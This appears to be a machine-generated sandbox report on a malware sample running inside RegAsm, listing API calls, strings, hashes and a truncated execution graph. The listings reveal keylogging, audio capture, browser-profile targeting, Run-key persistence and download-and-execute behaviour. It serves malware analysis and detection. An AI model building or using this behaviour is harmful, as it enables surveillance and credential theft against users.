• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: fYM/
• API String ID: 442123175-2459865102
• Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
• Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
• Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
• Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100097C3
• GetLastError.KERNEL32(?,10009C64,?,00000000,?,00000000,00000000,?,00000000), ref: 100097EC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: fYM/
• API String ID: 442123175-2459865102
• Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
• Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
• Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
• Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
• Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
• Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
• Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
• Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
APIs
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
• Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
• Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
• Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
• Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
• Opcode ID: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
• Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
• Opcode Fuzzy Hash: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
• Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
• Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
• Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
• Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
• Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
• Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
• ___raise_securityfailure.LIBCMT ref: 10002C36
Strings
• String ID: fYM/
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
Strings
• String ID: alarm.wav$hYG
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
Strings
• String ID: Online Keylogger Stopped
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
• String ID: Unknown exception
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
APIs
• waveInPrepareHeader.WINMM(00309000,00000020,?), ref: 00401849
• waveInAddBuffer.WINMM(00309000,00000020), ref: 0040185F
Strings
• String ID: XMG
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
Strings
• String ID: IsValidLocaleName$kKD
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
Strings
• String ID: UserProfile$\AppData\Local\Google\Chrome\
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
Strings
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
Strings
• String ID: AppData$\Opera Software\Opera Stable\
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: X13
• API String ID: 269201875-3831742654
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$fYM/
• API String ID: 2593887523-491538088
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: Free
• String ID: FlsFree$fYM/
• API String ID: 3978063606-3022025479
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: !D@$open
• API String ID: 587946157-1586967515
APIs
• GetKeyState.USER32(00000012), ref: 0040B6E0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 00410F64
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,kG$0kG
• API String ID: 1881088180-2015055088
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
                                                                                                                                  APIs
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage: 6%
                                                                                                                                  Dynamic/Decrypted Code Coverage: 9.2%
                                                                                                                                  Signature Coverage: 0%
                                                                                                                                  Total number of Nodes: 2000
                                                                                                                                  Total number of Limit Nodes: 66
                                                                                                                                  execution_graph: interactive node/edge graph of the RegAsm process (address, API call and edge listing of the rendered graph, truncated in this copy)
38755->38758 38759 4099f4 3 API calls 38755->38759 39350 413f27 38756->39350 38758->38755 38759->38755 38761 413e37 GetModuleHandleW 38763 413e1f 38761->38763 38764 413e46 38761->38764 38762 413e6a QueryFullProcessImageNameW 38762->38763 38763->38761 38763->38762 39355 413959 38763->39355 39371 413ca4 38763->39371 38764->38763 38766 413ea2 CloseHandle 38766->38755 38768 414c2e 16 API calls 38767->38768 38769 403eb7 38768->38769 38770 414c2e 16 API calls 38769->38770 38771 403ec5 38770->38771 38772 409d1f 6 API calls 38771->38772 38773 403ee2 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 403efd 38774->38775 38776 409d1f 6 API calls 38775->38776 38777 403f15 38776->38777 38778 403af5 20 API calls 38777->38778 38779 403f29 38778->38779 38780 403af5 20 API calls 38779->38780 38781 403f3a 38780->38781 38782 40414f 33 API calls 38781->38782 38788 403f4f 38782->38788 38783 403faf 39384 40b1ab free free 38783->39384 38785 403f5b memset 38785->38788 38786 403fb7 38786->38432 38787 4099c6 2 API calls 38787->38788 38788->38783 38788->38785 38788->38787 38789 40a8ab 9 API calls 38788->38789 38789->38788 38791 414c2e 16 API calls 38790->38791 38792 403d26 38791->38792 38793 414c2e 16 API calls 38792->38793 38794 403d34 38793->38794 38795 409d1f 6 API calls 38794->38795 38796 403d51 38795->38796 38797 409d1f 6 API calls 38796->38797 38798 403d6c 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 403d84 38799->38800 38801 403af5 20 API calls 38800->38801 38802 403d98 38801->38802 38803 403af5 20 API calls 38802->38803 38804 403da9 38803->38804 38805 40414f 33 API calls 38804->38805 38811 403dbe 38805->38811 38806 403e1e 39385 40b1ab free free 38806->39385 38808 403dca memset 38808->38811 38809 403e26 38809->38448 38810 4099c6 2 API calls 38810->38811 38811->38806 38811->38808 38811->38810 38812 40a8ab 9 API calls 38811->38812 38812->38811 38814 414b81 8 API calls 38813->38814 38815 414c40 38814->38815 38816 414c73 memset 38815->38816 39386 409cea 38815->39386 
38817 414c94 38816->38817 39389 414592 RegOpenKeyExW 38817->39389 38821 414c64 SHGetSpecialFolderPathW 38822 414d0b 38821->38822 38822->38452 38823 414cc1 38824 414cf4 wcscpy 38823->38824 39390 414bb0 wcscpy 38823->39390 38824->38822 38826 414cd2 39391 4145ac RegQueryValueExW 38826->39391 38828 414ce9 RegCloseKey 38828->38824 38830 409d43 wcscpy 38829->38830 38832 409d62 38829->38832 38831 409719 2 API calls 38830->38831 38833 409d51 wcscat 38831->38833 38834 445389 38832->38834 38833->38832 38835 40ae18 9 API calls 38834->38835 38840 4453c4 38835->38840 38836 40ae51 9 API calls 38836->38840 38837 4453f3 38839 40aebe FindClose 38837->38839 38838 40add4 2 API calls 38838->38840 38841 4453fe 38839->38841 38840->38836 38840->38837 38840->38838 38842 445403 250 API calls 38840->38842 38841->38500 38842->38840 38843->38404 38844->38496 38845->38480 38846->38480 38847->38510 38849 409c89 38848->38849 38849->38535 38850->38564 38852 413d39 38851->38852 38853 413d2f FreeLibrary 38851->38853 38854 40b633 free 38852->38854 38853->38852 38855 413d42 38854->38855 38856 40b633 free 38855->38856 38857 413d4a 38856->38857 38857->38526 38858->38433 38859->38440 38860->38462 38862 44db70 38861->38862 38863 40b6fc memset 38862->38863 38864 409c70 2 API calls 38863->38864 38865 40b732 wcsrchr 38864->38865 38866 40b743 38865->38866 38867 40b746 memset 38865->38867 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 40b76f 38868->38869 38870 409d1f 6 API calls 38869->38870 38871 40b783 38870->38871 39392 409b98 GetFileAttributesW 38871->39392 38873 40b792 38875 409c70 2 API calls 38873->38875 38887 40b7c2 38873->38887 38877 40b7a5 38875->38877 38880 40b2cc 27 API calls 38877->38880 38878 40b837 CloseHandle 38882 40b83e memset 38878->38882 38879 40b817 39496 409a45 GetTempPathW 38879->39496 38883 40b7b2 38880->38883 39426 40a6e6 WideCharToMultiByte 38882->39426 38884 409d1f 6 API calls 38883->38884 38884->38887 38885 40b827 38885->38882 39393 40bb98 38887->39393 38888 40b866 39427 
444432 38888->39427 38891 40bad5 38894 40b04b ??3@YAXPAX 38891->38894 38892 40b273 27 API calls 38893 40b89a 38892->38893 39473 438552 38893->39473 38896 40baf3 38894->38896 38896->38473 38898 40bacd 39476 443d90 38898->39476 38901 40bac6 39526 424f26 122 API calls 38901->39526 38902 40b8bd memset 39517 425413 17 API calls 38902->39517 38905 425413 17 API calls 38923 40b8b8 38905->38923 38908 40a71b MultiByteToWideChar 38908->38923 38909 40a734 MultiByteToWideChar 38909->38923 38912 40b9b5 memcmp 38912->38923 38913 4099c6 2 API calls 38913->38923 38914 404423 37 API calls 38914->38923 38917 4251c4 136 API calls 38917->38923 38918 40bb3e memset memcpy 39527 40a734 MultiByteToWideChar 38918->39527 38920 40bb88 LocalFree 38920->38923 38923->38901 38923->38902 38923->38905 38923->38908 38923->38909 38923->38912 38923->38913 38923->38914 38923->38917 38923->38918 38924 40ba5f memcmp 38923->38924 39518 4253ef 16 API calls 38923->39518 39519 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38923->39519 39520 4253af 17 API calls 38923->39520 39521 4253cf 17 API calls 38923->39521 39522 447280 memset 38923->39522 39523 447960 memset memcpy memcpy memcpy 38923->39523 39524 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38923->39524 39525 447920 memcpy memcpy memcpy 38923->39525 38924->38923 38925->38475 38927 40aebe FindClose 38926->38927 38928 40ae21 38927->38928 38929 4099c6 2 API calls 38928->38929 38930 40ae35 38929->38930 38931 409d1f 6 API calls 38930->38931 38932 40ae49 38931->38932 38932->38539 38934 40ade0 38933->38934 38935 40ae0f 38933->38935 38934->38935 38936 40ade7 wcscmp 38934->38936 38935->38539 38936->38935 38937 40adfe wcscmp 38936->38937 38937->38935 38939 40ae7b FindNextFileW 38938->38939 38940 40ae5c FindFirstFileW 38938->38940 38941 40ae94 38939->38941 38942 40ae8f 38939->38942 38940->38941 38944 40aeb6 38941->38944 38945 409d1f 6 API calls 38941->38945 38943 40aebe FindClose 38942->38943 38943->38941 38944->38539 38945->38944 38947 40aed1 38946->38947 38948 
